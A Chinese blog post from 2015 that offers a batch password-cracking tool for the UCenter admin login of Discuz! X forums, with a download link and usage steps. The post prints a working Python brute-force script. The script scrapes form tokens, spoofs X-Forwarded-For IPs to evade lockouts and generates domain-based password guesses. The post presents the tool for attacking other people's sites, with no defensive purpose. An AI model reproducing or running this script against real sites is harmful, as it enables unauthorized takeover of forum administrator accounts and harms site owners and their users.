Discuz! X UC 批量破解工具(附送神器下载)


Mar 04 2015

Discuz! X UC 批量破解工具(附送神器下载)

首页 » 原创作品 » Discuz! X UC 批量破解工具(附送神器下载)   

Discuz! X UC 批量破解工具(付神器下载)

昨天发了Discuz! X 后台批量破解工具 在学员群交流的时候 ,有的学员提到能不能爆uc的,毕竟这个成功率比后台的成功率

大大的提高,只是第一次叫我写的时候,其实我是决绝,因为网上已经有类似的程序。

例如,

#coding:utf-8

import httplib,re,random,urllib,time

from sys import argv



# 进行爆破 

def getHtml(host,htmlhash,htmlpass,htmlseccode):

	ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))

	postHead={"Host":host,"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0","X-Forwarded-For":ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}

	postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'

	resultHtml=httplib.HTTPConnection(host, 80, False)

	resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',body=postContent,headers = postHead )

	page=resultHtml.getresponse()

	pageConect=page.read()

	return pageConect



#获取 formhash  和  seccodehidden

def gethashs(host):

	url='http://'+host+'/uc_server/admin.php'

	pageContent=urllib.urlopen(url).read()

	r1=re.compile('<input type="hidden" name="formhash" value="(\S+)" />')

	htmlhash=r1.findall(pageContent)[0]

	r2=re.compile('<input type="hidden" name="seccodehidden" value="(\S+)" />')

	htmlseccode=r2.findall(pageContent)[0]

	return htmlhash+' '+htmlseccode



#通过argv获取 host 字典 间隔时间 进行爆破

if(len(argv)==1):

	print '---->python '+argv[0]+' host地址 字典文件 间隔时间'

	print '---->python '+argv[0]+' 192.168.1.105 pass.txt 0.2'

else:

	host=argv[1]

	passfile=argv[2]

	sleeptime=argv[3]

	print '网站host为  '+host

#取域名 然后添加一些密码 

	hostuser=host.split('.')

	hostuser=hostuser[len(hostuser)-2]

	hostpass=[hostuser+'123',hostuser+'888',hostuser+hostuser,hostuser+'..',hostuser+'.',hostuser+'admin888',hostuser+'admin123',hostuser+'admin',hostuser+'123456']

	print '密码字典为  '+passfile

	print '间隔时间为  '+sleeptime

	print '--->'

	x=gethashs(host).split(' ')

	f=open(passfile,'r')

	htmlpass=f.read().split('\r\n')

	htmlpass=hostpass+htmlpass

	f.close()

	for i in range(len(htmlpass)):

		time.sleep(float(sleeptime))

		print '正在尝试密码'+htmlpass[i]

		if(getHtml(host,x[0],htmlpass[i],x[1])==''):

			print '密码为 '+htmlpass[i]

			break


其实这个改改就是一个很好的批量了。

后来想了想 ,下了几个dz版本,测试了一下,好像只有几个版本可以。反正就加多一个函数调试了 一会。

发现没有出错,暗月就发出来 给大家共享用用把,这类工具渗透dz的时候可能会给你带来意向不到的收获!

暗月测试的版本 可以使用的成功破解的版本是dzX 2.0 DzX 2.5

1.png


listurl.txt 你是填写的url password.txt 当然是我们的密码咯。10就是连接时间timeout

2.png


成功的话会在程序目录生成一个crack.txt

3.png


神器下载

本地下载

Discuz! X 2.0 2.5 UC 批量破解工具[moon].zip

网盘下载

链接:http://pan.baidu.com/s/1dD1ZcJZ 密码:l4it


通知:  代码审计班 四月结束 需要培训请在4月份前加入!



正文部分到此结束

文章标签: Discuz! X UC 批量破解工具

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «mysql insert延时注入 | Discuz! X 后台批量破解工具»

已有2条评论

匿名

2016-08-16 22:14 沙发
虚心请教,为什么我没有生成crack.txt呀?后面是执行log(删除了前几行)。
E:\Discuz-uu>Dz2_Uc.exe listurl.txt password.txt 10
USE: DZ_Carck.exe listurl.txt password.txt 10
###############################################################
后面没了?微信ibanzou,邮箱hugligibanzou@gmail.com,谢谢

mOon

2016-08-19 14:41
@匿名:格式不对  或者 没有成功。